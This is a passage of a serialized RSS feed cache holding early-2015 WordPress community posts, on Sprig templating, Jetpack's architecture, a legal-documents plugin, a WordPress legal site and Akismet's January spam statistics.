some theme developers have against using a templating engine like Twig is that it introduces a new layer of abstraction, as well as another thing to learn on top of WordPress’ usual way of structuring template files. Some believe that the <a href=\"http://en.wikipedia.org/wiki/Separation_of_concerns\" target=\"_blank\">separation of concerns</a> prohibits a theme developer from gaining a true understanding of how WordPress works.</p>\n<p>Adams clearly states that the purpose of Sprig is to help theme developers spend less time wading through template markup code and instead focus their efforts on creating beautiful themes. The Twig templating engine may not be your cup of tea, but many developers find that it helps them produce cleaner template code that is easier to reuse.</p>\n<p>If <a href=\"http://sprigwp.com/\" target=\"_blank\">Sprig</a> helps get you from here to there faster, then it might be worth incorporating into your theme development workflow. Check out the full <a href=\"https://github.com/zach-adams/sprig\" target=\"_blank\">documentation on GitHub</a>. The project is still under active development and Adams recommends you test Sprig heavily before using it in production.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 20:31:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:30;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"WPTavern: Part 1: George Stephanis on Why Jetpack is Not a Collection of Plugins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38269\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"http://wptavern.com/part-1-george-stephanis-on-why-jetpack-is-not-a-collection-of-plugins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2836:\"<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/JetpackPluginCollectionFeaturedImage.png\" rel=\"prettyphoto[38269]\"><img class=\"size-full wp-image-38279\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/JetpackPluginCollectionFeaturedImage.png?resize=638%2C200\" alt=\"Jetpack Plugin Collection Featured Image\" /></a>photo credit: <a href=\"https://www.flickr.com/photos/northbaywanderer/121971388/\">northbaywanderer</a> – <a href=\"http://creativecommons.org/licenses/by-sa/2.0/\">cc</a>\n<p>George Stephanis, who is a member of the Jetpack Pit Crew, published a post over the weekend that explains why <a title=\"http://stephanis.info/2015/01/31/why-jetpack-isnt-a-collection-of-plugins-part-the-first/\" href=\"http://stephanis.info/2015/01/31/why-jetpack-isnt-a-collection-of-plugins-part-the-first/\">Jetpack is not a collection of plugins</a>. According to Stephanis, dependency management in WordPress sucks. In a nutshell, a dependency is when a library, framework, component, theme, or plugin requires the existence of another to function. He gives a practical example of dependencies that highlights how quickly things could get messy.</p>\n<blockquote><p>Now, if <strong>Likes</strong>, <strong>Single Sign On</strong>, <strong>After the Deadline</strong>, <strong>Post by Email</strong> and others were their own plugins, and connected to a separate <strong>Jetpack Core</strong> plugin, versioning gets tricky. It could work, in theory, if every plugin is kept up to date, always and forever. But the instant that the user is using, say, an outdated version of <strong>Subscriptions</strong> with an outdated <strong>Jetpack Core</strong> (which work perfectly together), and then installs the up-to-date <strong>WP.me Shortlinks</strong> plugin, things could break because <strong>WP.me Shortlinks</strong> expects a more up-to-date <strong>Jetpack Core</strong>.</p>\n<p>So you go ahead and update <strong>Jetpack Core</strong> to current, but now <strong>Subscriptions</strong> — which used to work perfectly — now breaks because there was a method change in <strong>Jetpack Core</strong>, that is fixed in the up-to-date version of <strong>Subscriptions</strong>, but the user isn’t running the up-to-date version. Horrible UX.</p></blockquote>\n<p>He goes on to describe the installation flow for a plugin that needs Jetpack Core to function. A plugin that depends on Jetpack Core adds at least four additional steps to the installation flow.</p>\n<p>It’s a good article that answers the technical side of a commonly asked question. It also gives insight to those who may be thinking of creating alternatives to Jetpack using a similar model. In part two of the series, Stephanis plans to write about the variety of other reasons Jetpack is not a collection of plugins.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 17:46:14 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:31;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"WPTavern: How to Automatically Create Terms of Service and Privacy Policy Documents\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38257\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"http://wptavern.com/how-to-automatically-create-terms-of-service-and-privacy-policy-documents\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3716:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/AutoTermsOfServicePluginFeaturedImage.png\" rel=\"prettyphoto[38257]\"><img class=\"aligncenter size-full wp-image-38262\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/AutoTermsOfServicePluginFeaturedImage.png?resize=838%2C272\" alt=\"Auto Terms of Service Plugin Featured Image\" /></a></p>\n<p>If you own or operate a business and need a Terms of Service, Privacy, or various other legal documents, check out the <a title=\"https://github.com/Automattic/legalmattic\" href=\"https://github.com/Automattic/legalmattic\">Legalmattic repository</a> on Github. In 2014, Automattic open sourced all of its legal documents, including <a title=\"http://wptavern.com/automattic-open-sources-its-dmca-process-docs-on-github\" href=\"http://wptavern.com/automattic-open-sources-its-dmca-process-docs-on-github\">its DMCA takedown notice</a>. If you choose an Automattic legal document as a foundation to write your own, consider using the <a title=\"https://wordpress.org/plugins/auto-terms-of-service-and-privacy-policy/\" href=\"https://wordpress.org/plugins/auto-terms-of-service-and-privacy-policy/\">Auto Terms of Service and Privacy Policy plugin. </a></p>\n<p>Created by <a title=\"http://tourkick.com/\" href=\"http://tourkick.com/\">Clifford Paulick</a>, this plugin places the information entered into a version of Automattic’s <a href=\"http://en.wordpress.com/tos/\" rel=\"nofollow\">Terms of Service</a> and <a href=\"http://automattic.com/privacy/\" rel=\"nofollow\">Privacy Policy</a>, both available under the <a href=\"http://creativecommons.org/licenses/by-sa/3.0/\" rel=\"nofollow\">Creative Commons Sharealike</a> license. The documents are modified to exclude specifics to Automattic, such as mentions of Jetpack, WordPress.com, and VIP. Each document has generic language that can apply to most sites and service providers, including single sites, subscription sites, blog networks, and others.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/AutoTermsOfServicePluginSettings.png\" rel=\"prettyphoto[38257]\"><img class=\"size-full wp-image-38258\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/AutoTermsOfServicePluginSettings.png?resize=784%2C859\" alt=\"Add Your Company Info\" /></a>Add Your Company Info\n<p>Configuration is as simple as placing company information into the appropriate fields. Once entered, you’ll need to turn on the Display setting at the top to enable the three different shortcodes.</p>\n<ul>\n<li>[my_terms_of_service_and_privacy_policy]</li>\n<li>[my_terms_of_service]</li>\n<li>[my_privacy_policy]</li>\n</ul>\n<p>Here’s what the Tavern terms of service page looks like using the terms of service shortcode.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/AutoTermsOfServicePluginResult.png\" rel=\"prettyphoto[38257]\"><img class=\"size-full wp-image-38259\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/AutoTermsOfServicePluginResult.png?resize=731%2C826\" alt=\"Tavern Terms of Use Page\" /></a>Tavern Terms of Use Page\n<p>The plugin works as advertised and is a convenient way to provide legal documents if you’re a service provider like Automattic. However, if you need to fine tune the results, you can either copy the output from the shortcode and paste it into the page or use the source document from the <a title=\"https://github.com/Automattic/legalmattic\" href=\"https://github.com/Automattic/legalmattic\">Legalmattic repository</a>. While Automattic’s documents give you a head start, it’s probably still a good idea to seek legal counsel to review and edit them so they’re specifically tailored to your business.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 17:28:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:32;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"WPTavern: Richard Best Launches New Website Devoted to WordPress Legal Topics\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38247\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"http://wptavern.com/richard-best-launches-new-website-devoted-to-wordpress-legal-topics\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2361:\"<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/WPandLegalStuffFeaturedImage.png\" rel=\"prettyphoto[38247]\"><img class=\"size-full wp-image-38254\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/WPandLegalStuffFeaturedImage.png?resize=639%2C300\" alt=\"WP and Legal Stuff Featured Image\" /></a>photo credit: <a href=\"https://www.flickr.com/photos/c_nilsen/16359004332/\">c_nilsen</a> – <a href=\"http://creativecommons.org/licenses/by-nc-sa/2.0/\">cc</a>\n<p>Over the weekend, I stumbled across a new resource called <a title=\"http://wpandlegalstuff.com/\" href=\"http://wpandlegalstuff.com/\">WP and Legal Stuff </a>run by <a title=\"http://wpandlegalstuff.com/about/\" href=\"http://wpandlegalstuff.com/about/\">Richard Best</a>, a qualified lawyer in New Zealand, England, and Wales. The site focuses on legal matters related to WordPress and open source. Recent articles include:</p>\n<ul>\n<li><a title=\"http://wpandlegalstuff.com/using-wordpress-trademarks-business-product-service/\" href=\"http://wpandlegalstuff.com/using-wordpress-trademarks-business-product-service/\">Using the WordPress trademarks for your business, product or service</a></li>\n<li><a title=\"http://wpandlegalstuff.com/gpl-wpscan-vane/\" href=\"http://wpandlegalstuff.com/gpl-wpscan-vane/\">The GPL and the story of WPScan and Vane</a></li>\n<li><a title=\"http://wpandlegalstuff.com/automattic-open-licensing-open-data/\" href=\"http://wpandlegalstuff.com/automattic-open-licensing-open-data/\">Automattic, open licensing and open data</a></li>\n</ul>\n<p>His take on <a title=\"http://wpandlegalstuff.com/understanding-gpl-licensing-wordpress/\" href=\"http://wpandlegalstuff.com/understanding-gpl-licensing-wordpress/\">understanding the GPL licensing of WordPress</a> is a great primer for anyone not familiar with how it works. While Best does not give legal advice through the site, he provides an interesting perspective since most of the people who participate in WordPress legal discussions are not lawyers.</p>\n<p>WP and Legal Stuff is a unique site and one of the few to cover WordPress legal matters on a routine basis. I highly suggest you subscribe to <a title=\"http://wpandlegalstuff.com/feed/\" href=\"http://wpandlegalstuff.com/feed/\">his RSS feed</a> so you don’t miss his next post on WordPress themes, the GPL, and the conundrum of derivative works.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 16:37:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:33;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:24:\"Matt: Tech is Ridiculous\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44640\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"http://ma.tt/2015/02/tech-is-ridiculous/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:433:\"<blockquote><p>Yo’s Law: “in the 21st century tech industry, satire and reality are not merely indistinguishable but actually interchangeable.”</p></blockquote>\n<p>From Jon Evans’ <a href=\"http://techcrunch.com/2015/01/24/this-industry-is-still-completely-ridiculous/\">This Industry Is Still Completely Ridiculous</a>, a hilarious article with a conclusion (the ridiculous stuff is worth it) I agree with.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 01 Feb 2015 22:12:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:34;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"Akismet: January 2015 Stats Roundup\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"http://blog.akismet.com/?p=1777\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"http://blog.akismet.com/2015/02/01/january-2015-stats-roundup/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3884:\"<p>January has been a slow and steady month in Akismet-land. Whereas <a href=\"http://blog.akismet.com/2014/12/01/november-stats-roundup/\">in</a> <a href=\"http://blog.akismet.com/2014/10/01/september-stats-roundup/\">months</a> <a href=\"http://blog.akismet.com/2014/11/03/october-stats-roundup/\">prior</a>, we’ve broken daily spam records, in January the spammers took it easy and we never saw a day with over 300 million spam comments caught.</p>\n<div id=\"attachment_1778\" class=\"wp-caption alignnone\"><img class=\"size-large wp-image-1778\" src=\"https://akismet.files.wordpress.com/2015/02/akismet-spam-and-ham-stats-january-2015.png?w=700&h=438\" alt=\"graph of akismet spam and ham daily stats january 2015\" /><p class=\"wp-caption-text\">The busiest day in January was the 4th, with almost 257 million comments, and the slowest was the 29th with just over 174 million comments.</p></div>\n<p>The <strong>total number of spam comments caught in January was a mere 6,586,661,000</strong> – compare that to the over 10 billion comments in December,<strong> that’s a drop of 35%</strong>. We did have more comments this month than the same time last year – 5% more.</p>\n<div id=\"attachment_1780\" class=\"wp-caption alignright\"><img class=\"size-medium wp-image-1780\" src=\"https://akismet.files.wordpress.com/2015/02/antique-map-of-the-world.jpg?w=300&h=211\" alt=\"Antique map of the world\" width=\"300\" height=\"211\" /><p class=\"wp-caption-text\">This image, “<a href=\"https://www.flickr.com/photos/38703275@N06/6884641242\">Old Map (90)</a>” by <a href=\"https://www.flickr.com/photos/38703275@N06/\">rosario fiore</a>, is licensed under <a href=\"https://creativecommons.org/licenses/by-nd/2.0/\">CC BY-ND 2.0</a></p></div>\n<p>Let’s put this number in perspective. The latest figures for the world population were published in 2013 by the <a href=\"http://data.worldbank.org/\">world bank</a>, and the number was just over 7 billion.</p>\n<p>If we wrote down each spam comment caught this month on a piece of paper, and handed out each of these notes to one person in the world, we’d have enough people on earth to hold all of the papers. In fact, we’d have some people left over that didn’t need to hold a piece of paper.</p>\n<p>In contrast <strong>there were only 157,555,500 legitimate comments that came through</strong> this month. <strong>Legitimate comments account for about 2%</strong> of all the content Akismet sees come through.</p>\n<p>If we wrote down each legitimate comment we got this month on a piece of paper and gave each to one person, we’d need just 2% of the world population in order to hold them all.</p>\n<p>As for Akismet’s uptime: there were no service interruptions this month. You can find information about any performance issues on this blog, via <a href=\"https://twitter.com/akismet\">Twitter</a>, and on this <a href=\"http://status.automattic.com/9931/136079/Akismet-API\">status page</a>.</p>\n<p>You may have also seen a drop in spam comments this month on your own blog. If you are having any issues with spam or with Akismet, please feel free to <a href=\"http://akismet.com/contact/\">contact us</a>, we’re happy to help <span class=\"wp-smiley wp-emoji wp-emoji-mrgreen\" title=\":mrgreen:\">:mrgreen:</span>.</p>\n<p><em>This post is part of a monthly series summarizing some stats and figures from the Akismet universe. Feel free to browse <a href=\"http://blog.akismet.com/category/monthly-roundup/\">all of the posts in the series</a>.</em></p><br /> <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/akismet.wordpress.com/1777/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/akismet.wordpress.com/1777/\" /></a> <img alt=\"\" border=\"0\" src=\"http://pixel.wp.com/b.gif?host=blog.akismet.com&blog=116920&post=1777&subd=akismet&ref=&feed=1\" width=\"1\" height=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 01 Feb 2015 16:57:09 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Valerie\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:35;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"Matt: Federated Wikipedia\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44622\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"http://ma.tt/2015/01/federated-wikipedia/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:475:\"<p><a href=\"http://blog.jonudell.net/2015/01/22/a-federated-wikipedia/\">A federated Wikipedia by Jon Udell</a> talks about the ossification happening in the Wikipedia community, caused in part by its attachment to rules that were created with the best of intentions. All open source communities, including <a href=\"http://wordpress.org/\">WordPress</a>, have to be vigilant against this. Sometimes we have to throw out what worked before to create what will work tomorrow.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 31 Jan 2015 22:50:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:36;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Matt: John Scalzi on Semicolons\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44629\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"http://ma.tt/2015/01/john-scalzi-on-semicolons/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:965:\"<blockquote><p>I write novels. And with just about every novel I write, I try to do something new or different that I haven’t done before, in order to challenge myself as a writer, and to keep developing my skills. In The Android’s Dream, of example, I wrote in the third person for the first time; in Zoe’s Tale, I had a main character—a sixteen year old girl—whose life experience was substantially different from my own; with The Human Division, I wrote a novel comprised of thirteen stand-alone “episodes.”</p>\n<p>And now? With Lock In? What new thing have I done to stretch myself as a writer and teller of tales? Well, I’ll tell you; it’s something I’m really proud of, actually:</p>\n<p>I’ve written a novel entirely free of semicolons.</p></blockquote>\n<p>John Scalzi in <a href=\"http://torforgeblog.com/2014/08/04/pacing-doesnt-just-mean-wearing-a-groove-in-the-floor/\">Pacing Doesn’t Just Mean Wearing a Groove in the Floor</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 31 Jan 2015 05:03:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:37;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"WPTavern: Improvements to the Features as Plugins First Model\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38159\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"http://wptavern.com/improvements-to-the-features-as-plugins-first-model\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4185:\"<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/FeaturePluginModelImprovementFeaturedImage.png\" rel=\"prettyphoto[38159]\"><img class=\"size-full wp-image-38232\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/FeaturePluginModelImprovementFeaturedImage.png?resize=640%2C300\" alt=\"Feature Plugin Improvements\" /></a>photo credit: <a href=\"https://www.flickr.com/photos/terrancedc/9083765513/\">TerranceDC</a> – <a href=\"http://creativecommons.org/licenses/by-nc/2.0/\">cc</a>\n<p>Earlier this month, I described how the <a title=\"http://wptavern.com/the-features-as-plugins-first-model-is-a-mess\" href=\"http://wptavern.com/the-features-as-plugins-first-model-is-a-mess\">features as plugins first model is a mess</a>. Drew Jaynes, who is <a title=\"http://wptavern.com/drew-jaynes-to-lead-wordpress-4-2\" href=\"http://wptavern.com/drew-jaynes-to-lead-wordpress-4-2\">leading the development cycle 